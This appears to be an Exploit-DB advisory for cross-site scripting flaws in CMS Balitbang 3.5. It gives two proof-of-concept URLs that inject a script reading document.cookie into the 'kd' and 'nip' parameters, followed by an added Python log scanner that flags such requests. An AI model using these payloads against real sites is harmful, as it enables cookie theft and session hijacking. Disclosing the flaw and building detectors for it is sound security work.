CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities
2012-06-19T00:00:00
ID: EDB-ID:37430 | Type: exploitdb | Reporter: TheCyberNuxbie | Modified: 2012-06-19T00:00:00
Description
CMS Balitbang Multiple HTML Injection and Cross Site Scripting Vulnerabilities. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/54084/info
CMS Balitbang is prone to HTML-injection and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
CMS Balitbang 3.5 is vulnerable; other versions may also be affected.
http://www.example.com/balitbang/member/user.php?id=guruabsendetail&kd=<script>alert(document.cookie);</script> [XSS]
http://www.example.com/balitbang/admin/admin.php?mode=mengajar_detail&nip=<script>alert(document.cookie);</script> [XSS]
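
The two URLs above name the reflected parameters: `kd` on `member/user.php` and `nip` on `admin/admin.php`. As an added example (not part of the original advisory or of the CMS code), this Python script flags access-log lines where either parameter carries markup characters after percent-decoding. The log lines are constructed samples, and treating legitimate values as plain identifiers is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script suffix -> reflected parameter, taken from the advisory's two URLs.
WATCHED = {"/member/user.php": "kd", "/admin/admin.php": "nip"}
# Assumption: legitimate values are plain identifiers, so any of these
# characters in the decoded value deserves review.
MARKUP = re.compile(r"[<>\"'`]")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Jun/2012:10:00:01 +0000] "GET /balitbang/member/user.php?id=guruabsendetail&kd=12 HTTP/1.1" 200 512',
    '203.0.113.7 - - [19/Jun/2012:10:00:05 +0000] "GET /balitbang/member/user.php?id=guruabsendetail&kd=%3Cscript%3Ealert(document.cookie);%3C/script%3E HTTP/1.1" 200 540',
    '203.0.113.9 - - [19/Jun/2012:10:02:11 +0000] "GET /balitbang/admin/admin.php?mode=mengajar_detail&nip=%253Cscript%253E HTTP/1.1" 200 530',
    '203.0.113.9 - - [19/Jun/2012:10:02:30 +0000] "GET /balitbang/index.php?q=<b> HTTP/1.1" 200 100',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def flag_line(line):
    """Return (path, param, decoded_value) for a suspicious line, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    param = next((p for sfx, p in WATCHED.items() if url.path.endswith(sfx)), None)
    if param is None:
        return None  # not one of the two scripts named in the advisory
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        value = decode_fully(value)
        if name == param and MARKUP.search(value):
            return (url.path, param, value)
    return None

def scan(lines):
    return [hit for hit in map(flag_line, lines) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit only shows that markup was sent to a reflected parameter; the durable fix is HTML-encoding these values on output in the application.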